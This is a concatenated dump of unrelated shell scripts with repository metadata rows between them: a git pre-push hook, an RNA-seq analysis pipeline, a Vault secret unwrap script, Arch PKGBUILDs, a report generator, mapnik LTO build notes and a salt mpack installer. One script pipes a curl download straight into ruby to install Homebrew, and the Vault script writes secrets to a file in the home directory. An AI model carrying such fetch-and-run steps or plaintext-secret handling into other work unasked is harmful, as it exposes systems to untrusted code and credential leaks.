if [[ "$BRANCH" =~ $PROTECTED_BRANCHES ]]; then
  echo
  echo -e "${RED}Prevented push to protected branch \"$BRANCH\" by using a pre-push hook.${NC}"
  echo "You should submit a pull request on Github instead."
  echo
  echo "If you want to skip this check, invoke again with --no-verify "
  echo
  exit 1
fi

exit 0
| true
|
d217e5ab4a9fd2fc4b8a06bd10d3a0707ced8512
|
Shell
|
Miranda-Reich/MirandaReich-repo
|
/supplemental_code_original.sh
|
UTF-8
| 11,687
| 3.34375
| 3
|
[] |
no_license
|
#Supplemental code
#1. Fastqc quality assesment code
#!/bin/sh
source /opt/asn/etc/asn-bash-profiles-special/modules.sh
module load fastqc/0.10.1
module load gnu_parallel/201612222
########### This is example code to move your files from our class shared to scratch, unzip them, concatenated the R1 and R2 files for each individual, and run fastqc the concatenated files
## Recommended submission to ASC:
# 10 cores
# 2 hours
# 20gb
###### remove any the targeted scratch directory and any files within
rm -r /scratch/aubcls06/DaphniaPunk
mkdir /scratch/aubcls06/DaphniaPunk
### Change directory to the scratch directory
cd /scratch/aubcls06/DaphniaPunk
##### copy all .fastq.gz to scratch directory in parallel using GNU parallel
# ls = make a (memory) list of the .fastq.gz files in that directory
# | in parallel using as many cores as possible (one job on each core) but no more jobs, cp the file in the list
# options: -- eta give the estimate time --dry-run to see if being parsed correctly
# You can do this seperately for the files you need to run using this code from before changing the specific file names
ls /home/aubcls06/class_shared/Exp1_DaphniaDataset/*.fastq.gz | time parallel -j+0 --eta 'cp {} .'
# unzip in parallel. List all the * .gz files and run on as many jobs as cores (-j) as and don't add any more files (0)
ls *fastq.gz |time parallel -j+0 'gunzip {}'
#### Create list of names:
# ls (list) contents of directory with fastq files, cut the names of the files at
#underscore characters and keep the first three chunks (i.e. fields; -f 1,2,3),
#sort names and keep only the unique ones (there will be duplicates of all
#file base names because of PE reads), then send the last 6 lines to a file
#called list with tail
# 1 = C3
# 2 = CCAGTT
# 3 = L00
# 4 = R1
# 5 = 001
#### Make the list then use that list to Concatenate Forward Read (R1)files in parallel (Thanks Steven Sephic for this solution!)
ls | grep ".fastq" |cut -d "_" -f 1,2 | sort | uniq | parallel cat {1}_L00*_R1_*.fastq '>' {1}_All_R1.fastq ::: ${i}
##### Concatenate Reverse Reads (R2) files
ls | grep ".fastq" |cut -d "_" -f 1,2 | sort | uniq | parallel cat {1}_L00*_R2_*.fastq '>' {1}_All_R2.fastq ::: ${i}
## Run fastqc on the All files in parallel
ls *_All_R1.fastq | time parallel -j+0 --eta 'fastqc {}'
ls *_All_R2.fastq | time parallel -j+0 --eta 'fastqc {}'
##Copy zipped files into my directory
cp *fastq.zip /home/aubcls06/class_shared/miranda_reich/Daphnia_data
#2. Trimming with Trimmomatic code
#!/bin/sh
source /opt/asn/etc/asn-bash-profiles-special/modules.sh
module load fastqc/0.10.1
module load trimmomatic/0.35
module load gnu_parallel/201612222
## Recommended submission:
# 10 cores
# 2 hours
# 20gb
### Change directory to the scratch directory
cd /scratch/aubcls06/DaphniaPunk
################## Now for the Cleaning ################################
# copy over the fasta file with the adapter file to use for screening
cp /home/aubcls06/class_shared/code/AdaptersToTrim_All.fa .
#### Create list of names:
# ls (list) contents of directory with fastq files, cut the names of the files at
#underscore characters and keep the first three chunks (i.e. fields; -f 1,2,3),
#sort names and keep only the unique ones (there will be duplicates of all
#file base names because of PE reads), then send the last 6 lines to a file
#called list with tail
# HS03_TTAGGC_L005_R1_001.fastq.gz
# 1 = C2
# 2 = CCAGTT
# 3 = All
# 4 = R1
# 5 = 001
ls | grep ".fastq" |cut -d "_" -f 1,2 | sort | uniq > list
### while loop to process through the names in the list
while read i
do
############ Trimmomatic #############
############ Trim read for quality when quality drops below Q30 and remove sequences shorter than 36 bp
#MINLEN:<length> #length: Specifies the minimum length of reads to be kept.
#SLIDINGWINDOW:<windowSize>:<requiredQuality> #windowSize: specifies the number of bases to average across
#requiredQuality: specifies the average quality required.
# -threads is the option to define the number of threads (cores) to use. For this to be effective you need to request those cores at submission
# ON HOPPER: trimmomatic-0.36
java -jar /opt/asn/apps/trimmomatic_0.35/Trimmomatic-0.35/trimmomatic-0.35.jar PE -threads 10 -phred33 "$i"_All_R1.fastq "$i"_All_R2.fastq "$i"_All_R1_paired_threads.fastq "$i"_All_R1_unpaired_threads.fastq "$i"_All_R2_paired_threads.fastq "$i"_All_R2_unpaired_threads.fastq ILLUMINACLIP:AdaptersToTrim_All.fa:2:30:10 HEADCROP:10 LEADING:30 TRAILING:30 SLIDINGWINDOW:6:30 MINLEN:36
done<list
############### Now assess Quality again
#fastqc on the cleaned paired fastq files in parallel
ls *_R1_paired_threads.fastq | parallel -j+0 --eta 'fastqc {}'
ls *_R2_paired_threads.fastq | parallel -j+0 --eta 'fastqc {}'
##Copy zipped files into my directory
cp *_paired_threads_fastqc.zip /home/aubcls06/class_shared/miranda_reich/Daphnia_data
#3. Mapping and conversion from sam to bam using HiSat and Samtools
#!/bin/sh
#load modules
module load hisat2/2.0.5
module load samtools/1.3.1
module load gnu_parallel/201612222
### Change directory to the scratch directory
cd /scratch/aubcls06/Daphniapunk2
#Only way I could get this to run is when the index files are copied to DaphniaPunk scratch directory by hand.
# cp /home/aubcls06/class_shared/DaphniaPunk/Daphnia_pulex_INDEX3.1.ht2
# cp /home/aubcls06/class_shared/DaphniaPunk/Daphnia_pulex_INDEX3.2.ht2
# cp /home/aubcls06/class_shared/DaphniaPunk/Daphnia_pulex_INDEX3.3.ht2
# cp /home/aubcls06/class_shared/DaphniaPunk/Daphnia_pulex_INDEX3.4.ht2
# cp /home/aubcls06/class_shared/DaphniaPunk/Daphnia_pulex_INDEX3.5.ht2
# cp /home/aubcls06/class_shared/DaphniaPunk/Daphnia_pulex_INDEX3.6.ht2
# cp /home/aubcls06/class_shared/DaphniaPunk/Daphnia_pulex_INDEX3.7.ht2
# cp /home/aubcls06/class_shared/DaphniaPunk/Daphnia_pulex_INDEX3.8.ht2
#parallelize mapping
ls | grep "paired_threads.fastq" |cut -d "_" -f 1,2 | sort | uniq | time parallel -j+0 --eta hisat2 -p 10 --dta -x Daphnia_pulex_INDEX3 -1 {1}_All_R1_paired_threads.fastq {1}_All_R2_paired_threads.fastq -S {1}.sam ::: ${i}
while read i
do
samtools sort -@ 10 -o "$i".bam "$i".sam
done < list
#4. Assemble and merge transcripts together using StringTie
#!/bin/sh
#load modules
module load stringtie/1.3.3
module load gnu_parallel/201612222
#move into directory
cd /scratch/aubcls06/DaphniaPunk/
#copy over annotation file daphnia_genes2010_beta3.gtf before running script!!
#cp /home/aubcls06/class_shared/DaphniaPunk/daphnia_genes2010_beta3.gtf .
#Assemble transcripts for each sample
ls | grep ".bam" | cut -d "_" -f 1 | sort | uniq | time parallel -j+0 --eta stringtie -p 10 -G daphnia_genes2010_beta3.gtf -o {1}assembled.gtf -l {1} {1}*.bam ::: ${i}
#Get mergelist of assembled transcripts, letter 'a' added to transcript filename to allow grab of .gtf files ignoring index
ls *assembled.gtf | sort | uniq > mergelist.txt
#Merge transcripts from all samples
stringtie --merge -p 10 -G daphnia_genes2010_beta3.gtf -o stringtie_merged.gtf mergelist.txt
#Make appropriate directory heirarchy for ballgown
mkdir ballgown
#Estimate transcript abundances and create table counts for Ballgown
ls | grep ".bam" | cut -d "_" -f 1 | sort | uniq | time parallel -j+0 --eta stringtie -p 10 -G stringtie_merged.gtf -o ballgown/daph{1}/daph{1}.gtf -B -e {1}*.bam ::: ${i}
#Make tarball to bring over to R
tar -cvzf ballgown.tgz ballgown
cp *tgz /home/class_shared/aubcls06/miranda_reich/Daphnia_data
#5. Analysis differential gene expression using Ballgown in R
####Ballgown Differential Expression Analysis Basline####
#Code compiled from Pertea et. al 2016 Transcript-level expression analysis of RNA-seq experiments with HISAT, StringTie, and Ballgown
#Load relevant R packages, downloaded previously
#Ballgown and genefilter DL from bioconductor, RSkittleBrewer from AlyssaFreeze github, and Devtools and dplyr installed using install.packages
library(ballgown)
library(RSkittleBrewer)
library(genefilter)
library(dplyr)
library(devtools)
#Import the metadata summarizing the samples and treatments (must create this separately in a text editor;similar to colData file in garter snake practice)
pheno_data = read.csv("phenodata_Dp.csv")
#Import the countdata table made using the merge script.
# dataDir = the parent directory holding you StringTie output subdirectories/files
#samplePattern = pattern for ballgown to find in all your sample subdirectories
#daphnia_countdata = ballgown(dataDir = "CHANGEME", samplePattern = "CHANGEME", pData =pheno_data)
daphnia_countdata = ballgown(dataDir = "original_data", samplePattern = "daph", pData =pheno_data)
####Display data in tabular format####
#Filter low abundance genes out
daphnia_countdata_filt = subset(daphnia_countdata, "rowVars(texpr(daphnia_countdata)) >1", genomesubset=TRUE)
#Identify transcripts that show sig difs between groups
results_transcripts = stattest(daphnia_countdata_filt, feature="transcript", covariate = "treatment", getFC = TRUE, meas="FPKM")
#Identify genes that show statistically sig diffs between groups
results_genes = stattest(daphnia_countdata_filt, feature="gene", covariate = "treatment", getFC = TRUE, meas="FPKM")
#Add gene names and gene IDs to the results_trascripts data frame
results_transcripts = data.frame(geneNames=ballgown::geneNames(daphnia_countdata_filt), geneIDs=ballgown::geneIDs(daphnia_countdata_filt), results_transcripts)
#Sort the results from smallest P value to the largest
results_transcripts = arrange(results_transcripts,pval)
results_genes = arrange(results_genes,pval)
#Write results to a csv file that can be shared and distributed
write.csv(results_transcripts, "daphnia_transcript_results.csv", row.names = FALSE)
write.csv(results_genes, "daphnia_genes_results.csv", row.names = FALSE)
#Identify transcripts and genes with a q value <0.05
sig.transcripts <- subset(results_transcripts,results_transcripts$qval<0.05)
sig.genes <- subset(results_genes,results_genes$qval<0.05)
####Display data in visual format####
#Make pretty plot colors
tropical = c('darkorange', 'dodgerblue', 'hotpink', 'limegreen', 'yellow')
palette(tropical)
#Show the distribution of gene abundances (measured as FPKM with ballgown) across samples, colored by treatment
fpkm = texpr(daphnia_countdata,meas="FPKM")
fpkm = log2(fpkm+1)
boxplot(fpkm,col=as.numeric(pheno_data$treatment),las=2,ylab='log2(FPKM+1)')
#Plotting individual trascripts if you have one you want to target
ballgown::transcriptNames(daphnia_countdata)[12]
## 12
## "GTPBP6"
ballgown::geneNames(daphnia_countdata)[12]
## 12
## "GTPBP6
plot(fpkm[12,] ~ pheno_data$treatment, border=c(1,2),main=paste(ballgown::geneNames(daphnia_countdata)[12],' : ',ballgown::transcriptNames(daphnia_countdata)[12]),pch=19,xlab="Treatments",ylab='log2(FPKM+1)')
points(fpkm[12,] ~ jitter(as.numeric(pheno_data$treatment)),col=as.numeric(pheno_data$treatment))
#Plot structure and expression levels in a sample of all transcripts that share the same gene locus
plotTranscripts(ballgown::geneIDs(daphnia_countdata)[4.1], daphnia_countdata, main=c('Gene XIST in sample daphC3_CCGAAG'), sample=c('daphC3_CCGAAG'))
#Plot the average expression levels for all transcripts of a gene within different groups using the plotMeans function. Need to specify which gene to plot
plotMeans('MSTRG.7789', daphnia_countdata_filt, groupvar = "treatment",legend=FALSE)
| true
|
2287bd9ae43efeb598b49ca08ed882e6bb06db8f
|
Shell
|
jamesgua/tls_conn_test
|
/node/jsongen.sh
|
UTF-8
| 595
| 3.5625
| 4
|
[] |
no_license
|
#!/bin/bash
# Unwrap a Vault wrapped secret_id and write ~/.appRoleIDs.json with the
# role_id/secret_id pair used for AppRole login.
#   $1 - wrapped secret_id token
# Expects $role_id and $VAULT_ADDR in the environment; requires curl + jq.
if [ $# -ne 1 ]; then
  echo "must provide wrapped secret_id!"
  echo "usage: $0 \$wrapped_secret_id"
  exit 1
fi

jsonfile=$HOME/.appRoleIDs.json
# Create the file up front so a permission problem fails fast.
touch "$jsonfile"
if [ $? -ne 0 ]; then
  echo "No write permission, failed to generate json file"
  exit 1
fi

# Re-export role_id (from the environment) for child processes.
export role_id="$role_id"

# Unwrap the token; the raw response is parked in the json file just long
# enough for jq to extract the secret_id from it.
curl -H "X-Vault-Token: $1" -X POST "$VAULT_ADDR/v1/sys/wrapping/unwrap" > "$jsonfile"
secret_id=$(jq -r ".data.secret_id" "$jsonfile")
export secret_id

# Overwrite the temporary response with the final document in one write
# (fix: replaces the fragile multi-"echo | cat" assembly).
cat > "$jsonfile" <<EOF
{
"role_id":"$role_id",
"secret_id":"$secret_id"
}
EOF
| true
|
b7fe5b9ce251f539a4fc3f9fddba76db7d39698d
|
Shell
|
petronny/aur3-mirror
|
/monster-rpg2-lite/PKGBUILD
|
UTF-8
| 1,429
| 2.78125
| 3
|
[] |
no_license
|
# This is an example PKGBUILD file. Use this as a start to creating your own,
# and remove these comments. For more information, see 'man PKGBUILD'.
# NOTE: Please fill out the license field for your package! If it is unknown,
# then please put 'unknown'.
# Maintainer: René Reigel <stormtrooperofdeath@gmx.net>
pkgname=monster-rpg2-lite
pkgver=1.1
pkgrel=1
epoch=
pkgdesc="The Monster series of RPGs are high quality role-playing games. They are built from scratch with a focus on good story, unique gameplay features, and professional looking and sounding artwork and audio."
arch=('i686' 'x86_64')
url="http://www.nooskewl.com"
license=('commercial')
groups=()
depends=('libgl' 'libxinerama' 'libxxf86vm' 'libxfixes')
makedepends=()
checkdepends=()
optdepends=()
provides=()
conflicts=()
replaces=()
backup=()
options=()
install=
changelog=
source=(http://www.nooskewl.com/stuff/downloads/MonsterRPG2-lite-1.1.tar.bz2 'monster2')
noextract=()
md5sums=('e4bda2b736e884ac086a45a63a465723' 'b211e8eef420ab461871786115cb8fb3')
#generate with 'makepkg -g'
# No compilation happens: the tarball ships prebuilt binaries.  The 64-bit
# files sit at the top level; for i686 the 32bit/ subtree is promoted.
build() {
cd "$srcdir/MonsterRPG2-lite-$pkgver"
if [ "$CARCH" == "i686" ]; then
mv 32bit/* ./
fi
}
# Install the launcher wrapper into /usr/bin and the game data plus the
# bundled BASS audio libraries under /opt/$pkgname.
package() {
cd "$srcdir/MonsterRPG2-lite-$pkgver"
mkdir -p $pkgdir/usr/bin
install -m755 ../monster2 $pkgdir/usr/bin/
install -d -m755 $pkgdir/opt/$pkgname/
cp -av data libbassflac.so libbass.so LICENSE.txt monster2 README.txt $pkgdir/opt/$pkgname/
}
# vim:set ts=2 sw=2 et:
| true
|
e9f9c7c12e0cd498418026770f847dab658d20c7
|
Shell
|
timm/16
|
/rowporter
|
UTF-8
| 1,762
| 3.953125
| 4
|
[
"Unlicense"
] |
permissive
|
#!/usr/bin/env bash
# rowporter :simple text report generator from tab-seperated tables
# (c) Tim Menzies, BSD license (2 paragraph version), 2016
# Requires: bash, awk, fmt, tr
# Tested on linux and mac. As to windows: let me know how that goes.
# Tested using Google sheets, has problems with Excel. Anyone?
# Usage:
# [1] Write a spreadsheet where line1 are some headers
# [2] Name it something; e.g. myreport1
# [3] Do not use tabs in the spreadsheet.
# [4] The right-hand side column header should be 'Notes'
#     (case does not matter). Repsheet ignores all columns
#     after this column.
# [5] Write one report per row, under the headers. If a cell
#     needs a long comment, add it as e.g. [1] in the notes
#     column.
# [6] Save the sheet, tab-seperated format. Excel will generate
#     XXX.txt and Google Sheets will generate 'XXX.tsv'. Remember
#     that magic extension.
# [7] Execute
#
#     bash rowporter 'XXX*YYY'
#
#     where XXX is the report name (e.g. myreport1)
#     and YYY is the magic extension (e.g. tsv).
# [8] Look for the file XXX*YYY.out. Paste text from there into
#     emails. Report done!
# NOTE(review): tracing (set -x) is left enabled, so every command is
# echoed to stderr; presumably intentional for debugging -- confirm.
set -x
# F: input table (defaults to the 'fss16ess*tsv' glob); Width: fmt wrap column.
F=${1:-'fss16ess*tsv'}
Width=${2:-60}
# awk pass: line 1 is the header -- remember each column name and the index
# of the case-insensitive "notes" column (columns after it are ignored).
# Data lines: push "[n]" footnotes and "^* " bullets onto their own
# paragraphs inside the notes cell, print a separator, then one
# "Header : value" pair per column.  Empty cells print as "Y"
# (NOTE(review): looks like a deliberate "yes" default -- confirm).
# fmt pass: re-wrap to $Width columns; output lands in "$F.out".
cat "$F" |
awk 'BEGIN { FS="\t"; IGNORECASE = 1}
NR==1 { notes = NF
for(i=1;i<=NF;i++) {
if ( $i ~ /notes/ )
notes = i
head[i]=$i;
}; next}
NR > 1 {
gsub(/\[[0-9]/,"\n\n &",$notes)
gsub(/\^\* /,"\n\n &",$notes)
print("\n____________________________")
for(i=1;i<=notes;i++) {
txt = $i ~/^[ \t]*$/ ? "Y" : $i
print "\n" head[i],": " txt
}; next}
' |
fmt -$Width > "$F.out"
less "$F.out"
| true
|
5c43dbcce91c365920dabd264f4880cbb1573ed1
|
Shell
|
xkwangy/mapnik-packaging
|
/mapnik-lto.sh
|
UTF-8
| 8,599
| 2.609375
| 3
|
[] |
no_license
|
sudo apt-get install linux-headers-server linux-image-server linux-server
sudo mkdir /opt/
sudo chown mapnik -R /opt/
sudo apt-get update
sudo apt-get upgrade
sudo apt-get install binutils-gold subversion build-essential gcc-multilib
mkdir -p $HOME/deb
cd $HOME/deb
apt-get source binutils
cd ~/src
# http://llvm.org/docs/GoldPlugin.html
sudo apt-get install cvs texinfo bison flex
cvs -z 9 -d :pserver:anoncvs@sourceware.org:/cvs/src login
{enter "anoncvs" as the password}
cvs -z 9 -d :pserver:anoncvs@sourceware.org:/cvs/src co binutils
mv src/ binutils
cd binutils
export CFLAGS="-O2 -I$PREFIX/include"
export CXXFLAGS="-O2 -I$PREFIX/include"
export LDFLAGS="-O2 -L$PREFIX/lib"
export CC="gcc"
export CXX="g++"
export AR=ar
export NM=nm
vim binutils/ar.c
# grep for bfd_plugin_set_plugin
# change:
bfd_plugin_set_plugin (optarg);
# to:
bfd_plugin_set_plugin ("/opt/llvm/lib/LLVMgold.so");
./configure --prefix=/opt/binutils --enable-gold --enable-plugins
make
make install
mv /opt/binutils/bin/ld /opt/binutils/bin/ld-old
cp /opt/binutils/bin/ld.gold /opt/binutils/bin/ld
#cp gold/ld-new /opt/binutils/x86_64-unknown-linux-gnu/bin/ld
#mv /opt/binutils/bin/nm /opt/binutils/bin/nm-old
#cp binutils/nm-new /opt/binutils/x86_64-unknown-linux-gnu/bin/nm
svn co http://llvm.org/svn/llvm-project/llvm/trunk llvm
cd llvm/tools
svn co http://llvm.org/svn/llvm-project/cfe/trunk clang
cd ..
./configure \
--prefix=/opt/llvm \
--enable-optimized \
--with-binutils-include=$HOME/src/binutils/include
make
sudo make install
PREFIX=$HOME/projects/mapnik-static-build/sources
export PKG_CONFIG_PATH=$PREFIX/lib/pkgconfig
export PATH=$PREFIX/bin:/opt/llvm/bin:/opt/binutils/bin:$PATH
export CFLAGS="-O4 -I$PREFIX/include -fPIC"
export CXXFLAGS="-O4 -I$PREFIX/include -fPIC"
export LDFLAGS="-O4 -L$PREFIX/lib"
export CC="clang -use-gold-plugin"
export CXX="clang++ -use-gold-plugin"
export LD_LIBRARY_PATH=/opt/mapnik/lib:/opt/llvm/lib:/opt/binutils/lib:$PREFIX/lib:$LD_LIBRARY_PATH
# we patch ar to send --plugins option in all cases
# so this line is commented since it will not work anyway
#export AR="ar -rc --plugin /opt/llvm/lib/LLVMgold.so"
export NM="nm --plugin /opt/llvm/lib/LLVMgold.so"
export RANLIB=/bin/true
mkdir -p $PREFIX
cd $PREFIX/../
mkdir -p deps
# make sure this works: https://gist.github.com/1283119
cd $PREFIX/../deps
# sqlite
wget http://www.sqlite.org/sqlite-autoconf-3070800.tar.gz
tar xvf sqlite-autoconf-3070800.tar.gz
cd sqlite-autoconf-3070800
export CFLAGS="-DSQLITE_ENABLE_RTREE=1 "$CFLAGS
./configure --prefix=$PREFIX --enable-static --disable-shared
make -j6
make install
cd ../
# freetype
wget http://download.savannah.gnu.org/releases/freetype/freetype-2.4.6.tar.bz2
tar xvf ../deps/freetype-2.4.6.tar.bz2
cd freetype-2.4.6
./configure --prefix=$PREFIX \
--enable-static \
--disable-shared
make -j6
make install
# proj4
wget http://download.osgeo.org/proj/proj-datumgrid-1.5.zip
# we use trunk instead for better threading support
svn co http://svn.osgeo.org/metacrs/proj/trunk/proj proj-trunk # at the time pre-release 4.8.0
cd proj-trunk/nad
unzip ../../proj-datumgrid-1.5.zip # answer [y] yo overwrite
cd ../
./configure --prefix=$PREFIX \
--no-mutex \
--enable-static \
--disable-shared
make -j6
make install
cd ../
# zlib
wget http://zlib.net/zlib-1.2.5.tar.gz
tar xvf zlib-1.2.5.tar.gz
cd zlib-1.2.5
./configure --prefix=$PREFIX --static --64
make -j6
make install -i -k
# libpng
wget ftp://ftp.simplesystems.org/pub/libpng/png/src/libpng-1.5.5.tar.gz
tar xvf libpng-1.5.5.tar.gz
cd libpng-1.5.5
./configure --prefix=$PREFIX --with-zlib-prefix=`pwd`/../../sources/ --enable-static --disable-shared
make -j6
make install
cd ../
# libjpeg
wget http://www.ijg.org/files/jpegsrc.v8c.tar.gz
tar xvf jpegsrc.v8c.tar.gz
cd jpeg-8c
./configure --prefix=$PREFIX --enable-static --disable-shared
make -j6
make install
cd ../
# libtiff
wget http://download.osgeo.org/libtiff/tiff-3.9.5.tar.gz
tar xvf tiff-3.9.5.tar.gz
cd tiff-3.9.5
./configure --prefix=$PREFIX --enable-static --disable-shared
make -j6
make install
cd ../
wget http://download.icu-project.org/files/icu4c/4.8.1/icu4c-4_8_1-src.tgz
tar xvf icu4c-4_8_1-src.tgz
cd icu/source
./configure Linux --prefix=$PREFIX \
--with-library-bits=64 --enable-release \
make -j6
make install
cd ../../
sudo apt-get install python-dev
wget http://voxel.dl.sourceforge.net/project/boost/boost/1.47.0/boost_1_47_0.tar.bz2
tar xjvf boost_1_47_0.tar.bz2
cd boost_1_47_0
./bootstrap.sh
echo 'using clang ;' > ~/user-config.jam
./bjam -d2 \
linkflags="$LDFLAGS" \
cxxflags="$CXXFLAGS" \
--prefix=$PREFIX --with-python \
--with-thread \
--with-filesystem \
--with-program_options --with-system --with-chrono \
--with-regex \
-sHAVE_ICU=1 -sICU_PATH=$PREFIX \
toolset=clang \
link=static \
variant=release \
stage -a
./bjam \
linkflags="$LDFLAGS" \
cxxflags="$CXXFLAGS" \
--prefix=$PREFIX --with-python \
--with-thread \
--with-filesystem \
--with-program_options --with-system --with-chrono \
--with-regex \
-sHAVE_ICU=1 -sICU_PATH=$PREFIX \
toolset=clang \
link=static \
variant=release \
install
# no icu variant
./bjam --disable-icu \
# gdal 1.8.1
wget http://download.osgeo.org/gdal/gdal-1.8.1.tar.gz
tar xvf gdal-1.8.1.tar.gz
cd gdal-1.8.1
# add libdl and pthreads so that configure check against static libsqlite3
# does not blow up on: "unixDlOpen: error: undefined reference to 'dlopen'"
# and "undefined reference to 'pthread_mutexattr_init'"
export LDFLAGS="-ldl -pthread $LDFLAGS"
# or --unresolved-symbols=ignore-all
./configure --prefix=$PREFIX --enable-static --disable-shared \
--with-libtiff=$PREFIX \
--with-jpeg=$PREFIX \
--with-png=$PREFIX \
--with-static-proj4=$PREFIX \
--with-sqlite3=$PREFIX \
--with-spatialite=no \
--with-curl=no \
--with-geos=no \
--with-pcraster=no \
--with-cfitsio=no \
--with-odbc=no \
--with-libkml=no \
--with-pcidsk=no \
--with-jasper=no \
--with-gif=no \
--with-pg=no \
--with-vfk=no \
--with-grib=no
# note: --with-hide-internal-symbols=yes will break during linking of ogr.input..
llvm-ld: error: Cannot link in module '/home/mapnik/projects/mapnik-static-build/sources/lib/libgdal.a(ogrfeature.o)': Linking globals named '_ZNSt6vectorIiSaIiEE13_M_insert_auxEN9__gnu_cxx17__normal_iteratorIPiS1_EERKi': symbols have different visibilities!
llvm-ld: error: Cannot link archive '/home/mapnik/projects/mapnik-static-build/sources/lib/libgdal.a'
GDAL is now configured for x86_64-unknown-linux-gnu
Installation directory: /home/mapnik/projects/mapnik-static-build/sources
C compiler: clang -use-gold-plugin -O4 -I/home/mapnik/projects/mapnik-static-build/sources/include -fPIC
C++ compiler: clang++ -use-gold-plugin -O4 -I/home/mapnik/projects/mapnik-static-build/sources/include -fPIC
LIBTOOL support: yes
LIBZ support: external
LIBLZMA support: no
GRASS support: no
CFITSIO support: no
PCRaster support: no
NetCDF support: no
LIBPNG support: external
LIBTIFF support: external (BigTIFF=no)
LIBGEOTIFF support: internal
LIBJPEG support: external
8/12 bit JPEG TIFF: no
LIBGIF support: no
OGDI support: no
HDF4 support: no
HDF5 support: no
Kakadu support: no
JasPer support: no
OpenJPEG support: no
ECW support: no
MrSID support: no
MrSID/MG4 Lidar support: no
MSG support: no
GRIB support: no
EPSILON support: no
cURL support (wms/wcs/...):no
PostgreSQL support: no
MySQL support: no
Ingres support: no
Xerces-C support: no
NAS support: no
Expat support: yes
Google libkml support: no
ODBC support: no
PGeo support: no
PCIDSK support: old
OCI support: no
GEORASTER support: no
SDE support: no
Rasdaman support: no
DODS support: no
SQLite support: yes
SpatiaLite support: no
DWGdirect support no
INFORMIX DataBlade support:no
GEOS support: no
VFK support: no
Poppler support: no
OpenCL support: no
SWIG Bindings: no
Statically link PROJ.4: yes
enable OGR building: yes
enable pthread support: yes
hide internal symbols: no
make -j6
make install
cd ../
| true
|
1e9f711913d918b2f824afcf7176280bb27d1000
|
Shell
|
bradleygolden/mac-restore
|
/mac_restore.sh
|
UTF-8
| 821
| 3.21875
| 3
|
[] |
no_license
|
#!/bin/bash
# Restore a fresh macOS machine: install Homebrew, the Brewfile bundle,
# pyenv Python versions, system pip packages, and Atom plugins.
# (fix: the shebang was "#!bin/bash", missing the leading slash)

# Check for Homebrew; install it if it is missing.
# (fix: "test ! $(which brew)" relied on word-splitting accidents)
if ! command -v brew >/dev/null 2>&1; then
  /usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"
  echo 'export PATH="/usr/local/bin:$PATH"' >> ~/.bash_profile
fi

# install brew binaries/cask applications/app store applications
brew bundle --file=homebrew/Brewfile
brew cleanup

# setup pyenv shims and the Python versions we use
echo 'eval "$(pyenv init -)"' >> ~/.zshenv
echo "installing python versions..."
pyenv install 2.7.13
pyenv install 3.6.0
pyenv global system 2.7.13 3.6.0 # set python version defaults

# install necessary system wide pip packages
python3 -m pip install -r pip/requirements.txt

# setup atom
echo "installing atom plugins..."
apm install --packages-file atom/package-list.txt

# Create development folder
mkdir ~/Development
| true
|
ce255d86c0991eef7fe2cfcc12327451dba9374b
|
Shell
|
nrgaway/qubes-core-vchan-kvm
|
/archlinux/PKGBUILD
|
UTF-8
| 1,405
| 2.78125
| 3
|
[] |
no_license
|
#!/bin/bash
# shellcheck disable=SC2034
# This is an example PKGBUILD file. Use this as a start to creating your own,
# and remove these comments. For more information, see 'man PKGBUILD'.
# NOTE: Please fill out the license field for your package! If it is unknown,
# then please put 'unknown'.
# Maintainer: Olivier Medoc <o_medoc@yahoo.fr>
# NOTE(review): pkgname says "xen" but every artifact staged below is the
# KVM vchan variant (vchan-kvm.pc, libvchan-kvm.so) -- confirm naming.
pkgname=qubes-libvchan-xen
pkgver=`cat version`
pkgrel=2
epoch=
pkgdesc="The Qubes core libraries for installation inside a Qubes Dom0 and VM."
arch=("x86_64")
url="http://qubes-os.org/"
license=('GPL')
groups=()
depends=(qubes-vm-xen)
makedepends=(qubes-vm-xen)
checkdepends=()
optdepends=()
provides=('qubes-core-libs' 'qubes-libvchan')
conflicts=()
replaces=('')
backup=()
options=()
install=
changelog=
source=()
noextract=()
md5sums=() #generate with 'makepkg -g'
# Link the vchan and u2mfn source trees (checked out next to this
# PKGBUILD) into $srcdir, then build the u2mfn helper library and the
# vchan library itself.
build() {
ln -s $srcdir/../vchan $srcdir/vchan
ln -s $srcdir/../u2mfn $srcdir/u2mfn
(cd u2mfn; make)
(cd vchan; make -f Makefile.linux)
}
# Stage headers, the pkg-config file, and both shared libraries.
package() {
install -D -m 0644 vchan/libvchan.h $pkgdir/usr/include/vchan-kvm/libvchan.h
install -D -m 0644 u2mfn/u2mfnlib.h $pkgdir/usr/include/u2mfnlib.h
install -D -m 0644 u2mfn/u2mfn-kernel.h $pkgdir/usr/include/u2mfn-kernel.h
install -D -m 0644 vchan/vchan-xen.pc $pkgdir/usr/lib/pkgconfig/vchan-kvm.pc
install -D vchan/libvchan-kvm.so $pkgdir/usr/lib/libvchan-kvm.so
install -D u2mfn/libu2mfn.so $pkgdir/usr/lib/libu2mfn.so
}
# vim:set ts=2 sw=2 et:
| true
|
dbcb5b149e6f111d3dcdc063a213a1be3d38f06a
|
Shell
|
bazaarvoice/cloudbreak
|
/orchestrator-salt/src/main/resources/salt/salt/ambari/scripts/install-mpack.sh
|
UTF-8
| 384
| 2.828125
| 3
|
[
"LicenseRef-scancode-warranty-disclaimer",
"ANTLR-PD",
"CDDL-1.0",
"bzip2-1.0.6",
"Zlib",
"BSD-3-Clause",
"MIT",
"EPL-1.0",
"LicenseRef-scancode-proprietary-license",
"LicenseRef-scancode-jdbm-1.00",
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# Jinja-templated (rendered by salt) script: install an Ambari management
# pack, assembling optional flags from the mpack pillar data.
set -ex
ARGS=""
{% if mpack.purge %}
ARGS+="--purge"
{% endif %}
{% if mpack.force %}
ARGS+=" --force"
{% endif %}
{% if mpack.purgeList %}
ARGS+=" --purge-list {{ mpack.purgeList|join(',') }}"
{% endif %}
# "echo yes" answers ambari-server's interactive confirmation prompt.
echo yes | ambari-server install-mpack --mpack={{ mpack.mpackUrl }} ${ARGS} --verbose
# Record timestamp + URL of the installed mpack -- presumably checked by
# the salt state for idempotence; confirm against the state file.
echo "$(date +%Y-%m-%d:%H:%M:%S) {{ mpack.mpackUrl }}" >> /var/mpack_installed
| true
|
1068dc28e2536dfe7d842a611af6ff0b9eac17b3
|
Shell
|
aprokop/package_configs
|
/trilinos_dtk
|
UTF-8
| 1,509
| 2.84375
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# CMake configure wrapper for a Trilinos build tailored to DataTransferKit
